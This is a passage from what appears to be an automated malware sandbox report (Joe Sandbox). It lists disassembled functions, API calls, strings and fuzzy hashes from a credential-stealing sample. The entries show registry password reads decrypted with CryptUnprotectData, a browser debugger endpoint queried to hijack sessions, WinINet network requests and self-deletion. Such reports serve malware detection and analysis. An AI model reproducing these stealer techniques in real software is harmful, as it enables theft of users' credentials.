lstrcat.KERNEL32(00000000,00435128), ref: 009E4E5D
lstrcpy.KERNEL32(00000000,00000000), ref: 009E4E82
lstrcpy.KERNEL32(00000000,00000000), ref: 009E4EAF
lstrcat.KERNEL32(00000000,00000000), ref: 009E4EBA
lstrcpy.KERNEL32(00000000,00000000), ref: 009E4EE1
StrStrA.SHLWAPI(?,00000000), ref: 009E4EF3
lstrlen.KERNEL32(?), ref: 009E4F07
lstrcpy.KERNEL32(00000000,0042D01C), ref: 009E4F48
lstrcpy.KERNEL32(00000000,?), ref: 009E4FCF
lstrcpy.KERNEL32(00000000,?), ref: 009E4FF8
lstrcpy.KERNEL32(00000000,?), ref: 009E5021
lstrcpy.KERNEL32(00000000,?), ref: 009E5047
lstrcpy.KERNEL32(00000000,?), ref: 009E5074

Strings

^userContextId=4294967295, xrefs: 009E4F6B
moz-extension+++, xrefs: 009E4F4E

Memory Dump Source

Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcatlstrlen$AllocLocal
String ID: ^userContextId=4294967295$moz-extension+++
API String ID: 4107348322-3310892237
Opcode ID: c535538295cf927e4ad7d4988a7939e691af68d1af9c9ce74a322f86091860ce
Instruction ID: 9a6b4f963121c8ecb3671f4918ab108846df8c09df4a0b9dd411cc68e27c2de2
Opcode Fuzzy Hash: c535538295cf927e4ad7d4988a7939e691af68d1af9c9ce74a322f86091860ce
Instruction Fuzzy Hash: 18B1C471A006869BCB21EF79DC85AAE7BFAEF94305F058529F805A7351DB74EC01CB90

Function 009D6DE7 Relevance: 30.0, APIs: 16, Strings: 1, Instructions: 229networkstringfileCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,?), ref: 009D6E16
lstrcpy.KERNEL32(00000000,0042D01C), ref: 009D6E69
InternetOpenA.WININET(0042D01C,00000001,00000000,00000000,00000000), ref: 009D6E7C
StrCmpCA.SHLWAPI(?,00638C80), ref: 009D6E94
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 009D6EBC
HttpOpenRequestA.WININET(00000000,00435080,?,00638AB4,00000000,00000000,-00400100,00000000), ref: 009D6EF7
InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 009D6F1E
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 009D6F2D
HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 009D6F4C
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 009D6FA6
lstrcpy.KERNEL32(00000000,?), ref: 009D7002
InternetReadFile.WININET(?,00000000,000007CF,?), ref: 009D7024
InternetCloseHandle.WININET(00000000), ref: 009D7035
InternetCloseHandle.WININET(?), ref: 009D703F
InternetCloseHandle.WININET(00000000), ref: 009D7049
lstrcpy.KERNEL32(00000000,00000000), ref: 009D706A

Strings

ERROR, xrefs: 009D6F59

Memory Dump Source

Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd

Yara matches

Similarity

API ID: Internet$lstrcpy$CloseHandleHttp$FileOpenReadRequest$ConnectInfoOptionQuerySend
String ID: ERROR
API String ID: 3687753495-2861137601
Opcode ID: a43b9379aa70902b9fe23a2ba63752c4a5319e5b5f130dfff9325232be693c62
Instruction ID: 19ecffff0ab7ea31e89c06fb45867530b06454e038df8291e03d8061992619b2
Opcode Fuzzy Hash: a43b9379aa70902b9fe23a2ba63752c4a5319e5b5f130dfff9325232be693c62
Instruction Fuzzy Hash: D3816F71A81215ABEB20DFA4DC45FAEB7B9EF44704F148169F904E7380DB74AD058BA4

Function 009EC0E7 Relevance: 30.0, APIs: 16, Strings: 1, Instructions: 203stringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,0042D01C), ref: 009EC11A
lstrcpy.KERNEL32(00000000,0042D01C), ref: 009EC14D
lstrlen.KERNEL32(004353D4), ref: 009EC158
lstrcpy.KERNEL32(00000000,?), ref: 009EC178
lstrcat.KERNEL32(00000000,004353D4), ref: 009EC184
lstrcpy.KERNEL32(00000000,00000000), ref: 009EC1A7
lstrcat.KERNEL32(00000000,00000000), ref: 009EC1B2
lstrlen.KERNEL32(0043540C), ref: 009EC1BD
lstrcpy.KERNEL32(00000000,00000000), ref: 009EC1DA
lstrcat.KERNEL32(00000000,0043540C), ref: 009EC1E6
lstrcpy.KERNEL32(00000000,00000000), ref: 009EC20D
lstrlen.KERNEL32(00435410), ref: 009EC22D
lstrcpy.KERNEL32(00000000,?), ref: 009EC24F
lstrcat.KERNEL32(00000000,00435410), ref: 009EC25B
lstrcpy.KERNEL32(00000000,00000000), ref: 009EC281
ShellExecuteEx.SHELL32(?), ref: 009EC2D3

Strings

<, xrefs: 009EC2B4

Memory Dump Source

Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$lstrlen$ExecuteShell
String ID: <
API String ID: 4016326548-4251816714
Opcode ID: 948e5f2a0fe88fc6292e69687398adab40a5ba38be72b988fe604048f0edeb44
Instruction ID: b0e3695742e1998e1d77f37a055116cd7bcf50c2b8038daa6b10f67e08ceffef
Opcode Fuzzy Hash: 948e5f2a0fe88fc6292e69687398adab40a5ba38be72b988fe604048f0edeb44
Instruction Fuzzy Hash: 9761D8B1A042859BCB11AFB58C8976E7BB9EF45308F04442AF445E7352DB78CD02DB90

Function 004090F0 Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 161networkstringfileCOMMON

Download Yara Rule

APIs

InternetOpenA.WININET(0042D01C,00000001,00000000,00000000,00000000), ref: 0040910F
InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 0040912C
InternetCloseHandle.WININET(00000000), ref: 00409139
strlen.MSVCRT ref: 00409155
InternetReadFile.WININET(?,?,?,00000000), ref: 00409196
InternetReadFile.WININET(00000000,?,00001000,?), ref: 004091C7
InternetCloseHandle.WININET(00000000), ref: 004091D2
InternetCloseHandle.WININET(00000000), ref: 004091D9
strlen.MSVCRT ref: 004091EA
strlen.MSVCRT ref: 0040921D
strlen.MSVCRT ref: 0040925E

Part of subcall function 00417EB0: memchr.MSVCRT ref: 00417EEF
Part of subcall function 00417EB0: memcmp.MSVCRT(00000000,?,?,?,"webSocketDebuggerUrl":,00000000), ref: 00417F09
Part of subcall function 00417EB0: memchr.MSVCRT ref: 00417F28

strlen.MSVCRT ref: 0040927C

Part of subcall function 004089B0: std::_Xinvalid_argument.LIBCPMT ref: 004089C6

Strings

http://localhost:9229/json, xrefs: 00409126
"ws://, xrefs: 00409259, 00409264
"webSocketDebuggerUrl":, xrefs: 004091E5, 004091F0

Memory Dump Source

Source File: 00000008.00000002.1933389004.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.1933389004.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_DADE.jbxd

Yara matches

Similarity

API ID: Internet$strlen$CloseHandle$FileOpenReadmemchr$Xinvalid_argumentmemcmpstd::_
String ID: "webSocketDebuggerUrl":$"ws://$http://localhost:9229/json
API String ID: 4166274400-2144369209
Opcode ID: 0c6aa3a70782f887abaeb98b790b0c8f3578e5d0b449c1f4a755a60c44504834
Instruction ID: a7d092efa737f0fe45e53d089a45e304e661b41fe404ce77bc48f3d160830c15
Opcode Fuzzy Hash: 0c6aa3a70782f887abaeb98b790b0c8f3578e5d0b449c1f4a755a60c44504834
Instruction Fuzzy Hash: AD51C571B00205ABDB20DFA4DC45BDEF7F9DB48714F14416AF904E3281DBB8EA4587A9

Function 009DB660 Relevance: 25.5, APIs: 20, Instructions: 451stringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,0042D01C), ref: 009DB687
lstrcpy.KERNEL32(00000000,00000000), ref: 009DB6D5
lstrcpy.KERNEL32(00000000,00000000), ref: 009DB700
lstrcat.KERNEL32(00000000,00000000), ref: 009DB708
lstrcpy.KERNEL32(00000000,00000000), ref: 009DB730
lstrlen.KERNEL32(00435214), ref: 009DB7A7
lstrcpy.KERNEL32(00000000,00000000), ref: 009DB7CB
lstrcat.KERNEL32(00000000,00435214), ref: 009DB7D7
lstrcpy.KERNEL32(00000000,00000000), ref: 009DB800
lstrlen.KERNEL32(00000000), ref: 009DB884
lstrcpy.KERNEL32(00000000,00000000), ref: 009DB8AE
lstrcat.KERNEL32(00000000,00000000), ref: 009DB8B6
lstrcpy.KERNEL32(00000000,00000000), ref: 009DB8DE
lstrlen.KERNEL32(0043509C), ref: 009DB955
lstrcpy.KERNEL32(00000000,00000000), ref: 009DB979
lstrcat.KERNEL32(00000000,0043509C), ref: 009DB985
lstrcpy.KERNEL32(00000000,00000000), ref: 009DB9B5
lstrlen.KERNEL32(?), ref: 009DBABE
lstrlen.KERNEL32(?), ref: 009DBACD
lstrcpy.KERNEL32(00000000,00000000), ref: 009DBAF5

Memory Dump Source

Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat
String ID:
API String ID: 2500673778-0
Opcode ID: caf0e5c52129c9e0c170800c9da7536f1db1eb5a9e1db09bea434f579a2868c7
Instruction ID: 4842497ed0685af3812aeeb33a8ab6afb4f20cab3bf68c34e2237c54d32cdf24
Opcode Fuzzy Hash: caf0e5c52129c9e0c170800c9da7536f1db1eb5a9e1db09bea434f579a2868c7
Instruction Fuzzy Hash: 81022A70A41206CFCB24DF65C998B6ABBF9AF85309F19C06AE4099B361D775DC42CF90

Function 009EDD07 Relevance: 24.3, APIs: 16, Instructions: 292stringCOMMON

Download Yara Rule

APIs

SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 009EDD62
lstrcpy.KERNEL32(00000000,?), ref: 009EDD95
lstrcat.KERNEL32(?,00000000), ref: 009EDDA3
lstrcat.KERNEL32(?,00638B0C), ref: 009EDDBD
lstrcat.KERNEL32(?,?), ref: 009EDDD1
lstrcat.KERNEL32(?,00638DD8), ref: 009EDDE5
lstrcpy.KERNEL32(00000000,?), ref: 009EDE15
GetFileAttributesA.KERNEL32(00000000), ref: 009EDE1C
lstrcpy.KERNEL32(00000000,0042D01C), ref: 009EDE85

Memory Dump Source

Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$AttributesFileFolderPath
String ID:
API String ID: 4230089145-0
Opcode ID: caaa19fadc927b35984568f42d9d16b1ba36910b8c96aa7197b0648623c382f7
Instruction ID: fd5195b757d44b0046852343a01e3affd672b5befab3e255dc706b10f0b1a652
Opcode Fuzzy Hash: caaa19fadc927b35984568f42d9d16b1ba36910b8c96aa7197b0648623c382f7
Instruction Fuzzy Hash: 1FB180B19002999FDB11EFA4CC889EE7BB9FF88300F148869F505A7250DB749E44CFA0

Function 009F3967 Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 222registrystringCOMMON

Download Yara Rule

APIs

Part of subcall function 009F7477: lstrcpy.KERNEL32(00000000,ERROR), ref: 009F7495

RegOpenKeyExA.ADVAPI32(?,00638D44,00000000,00020019,?), ref: 009F39C4
RegEnumKeyExA.ADVAPI32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 009F39FE
wsprintfA.USER32 ref: 009F3A29
RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 009F3A47
RegCloseKey.ADVAPI32(?), ref: 009F3A55
RegCloseKey.ADVAPI32(?), ref: 009F3A5F
RegQueryValueExA.ADVAPI32(?,00638DC0,00000000,000F003F,?,?), ref: 009F3AA8
lstrlen.KERNEL32(?), ref: 009F3ABD
RegQueryValueExA.ADVAPI32(?,00638BD0,00000000,000F003F,?,00000400), ref: 009F3B2E
RegCloseKey.ADVAPI32(?), ref: 009F3B79
RegCloseKey.ADVAPI32(?), ref: 009F3B90

Strings

?, xrefs: 009F39A5
- , xrefs: 009F3B38

Memory Dump Source

Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd

Yara matches

Similarity

API ID: Close$OpenQueryValue$Enumlstrcpylstrlenwsprintf
String ID: - $?
API String ID: 13140697-712516993
Opcode ID: edf0bac9685c6a4e32c5945965864e6577cf50905678e5db7fdfb665f3f8e1b6
Instruction ID: 4d050c5debdea0264014e97c9b8f24271f2f9d8fa13eb69a9a6aa045f42ad077
Opcode Fuzzy Hash: edf0bac9685c6a4e32c5945965864e6577cf50905678e5db7fdfb665f3f8e1b6
Instruction Fuzzy Hash: D4915EB29002089FCB10DF94DC85AEEB7BAFB88315F148569F609AB211D7759E45CF90

Function 00407710 Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 202stringregistrymemoryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00407745
RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 0040778A
strlen.MSVCRT ref: 004077BE
StrStrA.SHLWAPI(?,Password), ref: 004077F8
strlen.MSVCRT ref: 0040788D

Part of subcall function 00407690: GetProcessHeap.KERNEL32(00000008,00000400), ref: 0040769E
Part of subcall function 00407690: HeapAlloc.KERNEL32(00000000), ref: 004076A5
Part of subcall function 00407690: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 004076CD
Part of subcall function 00407690: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 004076ED
Part of subcall function 00407690: LocalFree.KERNEL32(?), ref: 004076F7

strcpy_s.MSVCRT ref: 00407821
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040782C
HeapFree.KERNEL32(00000000), ref: 00407833
strlen.MSVCRT ref: 00407840
strcpy_s.MSVCRT ref: 0040786A
strlen.MSVCRT ref: 004078B4
RegEnumValueA.ADVAPI32(80000001,00000000,?,000000FF,00000000,00000003,?,?,80000001), ref: 00407975

Strings

Password, xrefs: 004077EC

Memory Dump Source

Source File: 00000008.00000002.1933389004.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.1933389004.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_DADE.jbxd

Yara matches

Similarity

API ID: Heapstrlen$EnumFreeProcessValuestrcpy_s$AllocByteCharCryptDataLocalMultiOpenUnprotectWide
String ID: Password
API String ID: 3893107980-3434357891
Opcode ID: 14964dbc208ebe2bd5570b721c02be0e9f6531da3a0e9e1e01ace35e59106e74
Instruction ID: e4d9b8b39298a74cb5cd03489e7ec67c358bc82c244f10be08d5cfcaf05cec85
Opcode Fuzzy Hash: 14964dbc208ebe2bd5570b721c02be0e9f6531da3a0e9e1e01ace35e59106e74
Instruction Fuzzy Hash: 16810EB1D00219AFDB10DF95DC84ADEB7B9EF48300F10816AE505F7250EB75AA45CFA5

Function 009F18A7 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 141stringCOMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?), ref: 009F18E8
lstrcpy.KERNEL32(00000000,00638C44), ref: 009F1913
lstrlen.KERNEL32(?,?,?,?), ref: 009F1920
lstrcpy.KERNEL32(00000000,00000000), ref: 009F193D
lstrcat.KERNEL32(00000000,?), ref: 009F194B
lstrcpy.KERNEL32(00000000,00000000), ref: 009F1971
lstrlen.KERNEL32(00638AA8,?,?,?), ref: 009F1986
lstrcpy.KERNEL32(00000000,?), ref: 009F19A9
lstrcat.KERNEL32(00000000,00638AA8), ref: 009F19B1
lstrcpy.KERNEL32(00000000,00000000), ref: 009F19D9
ShellExecuteEx.SHELL32(?), ref: 009F1A14
ExitProcess.KERNEL32 ref: 009F1A4A

Strings

<, xrefs: 009F19F5

Memory Dump Source

Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcatlstrlen$ExecuteExitFileModuleNameProcessShell
String ID: <
API String ID: 3579039295-4251816714
Opcode ID: 09672bfc39b299f7ced09603c6e6124d4d2c1ad6886d1f581e8bb92200c670ac
Instruction ID: a6cc832ea6d846e92230ff3bcedcfb35a3794fb78385f4ba8647ebc53d2ed02e
Opcode Fuzzy Hash: 09672bfc39b299f7ced09603c6e6124d4d2c1ad6886d1f581e8bb92200c670ac
Instruction Fuzzy Hash: 60514E7190161AEFDB11DFA4DC94AAEBBFEAF94304F00512AE505E3251DBB4AE41CBD0

Function 0041F100 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 163stringmemoryCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,?), ref: 0041F134
lstrcpy.KERNEL32(00000000,?), ref: 0041F162
StrCmpCA.SHLWAPI(00000000,ERROR,?,?,?,?,?,?,?,?,?,?,?,?,0041F67A), ref: 0041F176
lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,0041F67A), ref: 0041F185
LocalAlloc.KERNEL32(00000040,00000001,?,?,?,?,?,?,?,?,?,?,?,?,0041F67A), ref: 0041F1A3
StrStrA.SHLWAPI(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0041F67A), ref: 0041F1D1
lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0041F67A), ref: 0041F1E4
strtok.MSVCRT(00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,0041F67A), ref: 0041F1F6
lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041F67A), ref: 0041F202
lstrcpy.KERNEL32(00000000,ERROR), ref: 0041F24F
lstrcpy.KERNEL32(00000000,ERROR), ref: 0041F28F

Strings

ERROR, xrefs: 0041F170, 0041F20F, 0041F249, 0041F289

Memory Dump Source

Source File: 00000008.00000002.1933389004.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.1933389004.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_DADE.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$AllocLocalstrtok
String ID: ERROR
API String ID: 2137491262-2861137601
Opcode ID: 05761cc4364c42234ee252b2b5c3c3c7f577dcc16320945f4f877e0f0401f89e
Instruction ID: 57b76eaee00c9718718f693bae5590ba1c15cb9a89fb7e987ba6136f15d61003
Opcode Fuzzy Hash: 05761cc4364c42234ee252b2b5c3c3c7f577dcc16320945f4f877e0f0401f89e
Instruction Fuzzy Hash: DB51D375A002019FCB20AF75CD49AAB77B5AF44314F04417AF849EB3A1DB78DC468BD8

Function 0040A070 Relevance: 18.3, APIs: 12, Instructions: 251stringlibraryCOMMON

Download Yara Rule

APIs

GetEnvironmentVariableA.KERNEL32(00A76A20,00639BD8,0000FFFF), ref: 0040A086
lstrcpy.KERNEL32(00000000,0042D01C), ref: 0040A0B3
lstrlenA.KERNEL32(00639BD8), ref: 0040A0C0
lstrcpy.KERNEL32(00000000,00639BD8), ref: 0040A0EA
lstrlenA.KERNEL32(00435210), ref: 0040A0F5
lstrcpy.KERNEL32(00000000,00000000), ref: 0040A112
lstrcatA.KERNEL32(00000000,00435210), ref: 0040A11E
lstrcpy.KERNEL32(00000000,00000000), ref: 0040A144
lstrcatA.KERNEL32(00000000,00000000), ref: 0040A14F
lstrcpy.KERNEL32(00000000,00000000), ref: 0040A174
SetEnvironmentVariableA.KERNEL32(00A76A20,00000000), ref: 0040A18F
LoadLibraryA.KERNEL32(00A55CD8), ref: 0040A1A3

Memory Dump Source

Source File: 00000008.00000002.1933389004.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.1933389004.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_DADE.jbxd

Yara matches

Similarity

API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
String ID:
API String ID: 2929475105-0
Opcode ID: e71572c05e61fd10cfa811daea49d805ade7cf6361090e2ab5aad4db3d6ecf1a
Instruction ID: 94f9c8f72257bf504f41825e736cba288604a750adbbaa2107b6746afa8b652b
Opcode Fuzzy Hash: e71572c05e61fd10cfa811daea49d805ade7cf6361090e2ab5aad4db3d6ecf1a
Instruction Fuzzy Hash: E491B231600B009FC7209FA4DC44AA736A6EB44709F40517AF805AB3E1EBBDDD918BD6

Function 009DA2D7 Relevance: 18.3, APIs: 12, Instructions: 251stringlibraryCOMMON

Download Yara Rule

APIs

GetEnvironmentVariableA.KERNEL32(006388B4,00639BD8,0000FFFF), ref: 009DA2ED
lstrcpy.KERNEL32(00000000,0042D01C), ref: 009DA31A
lstrlen.KERNEL32(00639BD8), ref: 009DA327
lstrcpy.KERNEL32(00000000,00639BD8), ref: 009DA351
lstrlen.KERNEL32(00435210), ref: 009DA35C
lstrcpy.KERNEL32(00000000,00000000), ref: 009DA379
lstrcat.KERNEL32(00000000,00435210), ref: 009DA385
lstrcpy.KERNEL32(00000000,00000000), ref: 009DA3AB
lstrcat.KERNEL32(00000000,00000000), ref: 009DA3B6
lstrcpy.KERNEL32(00000000,00000000), ref: 009DA3DB
SetEnvironmentVariableA.KERNEL32(006388B4,00000000), ref: 009DA3F6
LoadLibraryA.KERNEL32(00638D78), ref: 009DA40A

Memory Dump Source

Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd

Yara matches

Similarity

API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
String ID:
API String ID: 2929475105-0
Opcode ID: bace05496e01b1bd5bfa0f9a446348f260bebc96a6f440727fdd5c41bd0dc464
Instruction ID: 42691c9f34953e31863a4ce5c298e320f3f8ab29da720fefc9517fc24cfd8ee6
Opcode Fuzzy Hash: bace05496e01b1bd5bfa0f9a446348f260bebc96a6f440727fdd5c41bd0dc464
